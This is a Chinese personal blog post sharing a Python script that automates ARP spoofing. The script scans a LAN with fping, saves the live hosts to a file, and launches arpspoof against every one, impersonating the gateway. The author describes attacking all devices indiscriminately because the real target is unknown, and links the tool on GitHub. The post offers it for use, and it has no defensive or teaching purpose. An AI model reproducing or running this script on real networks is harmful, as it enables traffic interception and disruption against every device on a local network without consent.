最近用到ARP欺骗攻击这个工具,发现了一些问题:由于不确定局域网中具体哪台设备才是你的攻击对象,所以我一般都会采用全部攻击的方式。但是这又会引申出另一个问题:首先需要扫描存活主机,然后再将存活的主机IP地址挨个进行手工攻击(可能有批量攻击的功能,但是我太笨了,没找到)。于是乎,我直接写了一个自动化处理脚本,让其自动扫描存活主机,然后进行自动攻击。

思路是这样的:首先执行fping将局域网中的存活主机ip地址保存到一个文件。然后程序打开该文件将每行ip地址读取并存放到一个列表变量中。最后拼接命令利用for语句进行批量攻击。

我也很不要脸的把它放到了GitHub,以后有机会再更新吧:GitHub连接

#import commands
import os
import re
print("################################")
print("#\n#\n    By:Zhuyingjie \n#\n#")
print("################################")
IP =  raw_input("Please enter the attack network address(like 192.168.0.1/24):")
IP = str(IP)
att1 = 'fping -ags '
att2 = ' > ip.txt'
IP = att1 + IP + att2
print("Construct command:"+ IP)                                                 #拼接指令
print("\n Scanning.........")
os.system(IP)                                                                   #执行命令,将结构保存到txt
list = []                                                                       #空列表,用于存放扫描到的IP
n = 0
cmd1 = "gnome-terminal -e \'arpspoof -i eth0 -t "
cmd2 = " 192.168.0.1\'"
f = open('ip.txt','r')                                        
if(f !=0):
    print('open file success!')
    print('output:')
    for echo in f:
        list.append(echo)                                                       #扫描结构读入到列表
        CMD = cmd1 + str(list[n]) + cmd2                                        #拼接指令
        n = n+1
        print ("The spoofed IP address is" + CMD)
        os.system(CMD)                                                          #执行攻击程序
    f.close()
朱古力

By 朱古力

一条咸鱼

发表评论

电子邮件地址不会被公开。 必填项已用*标注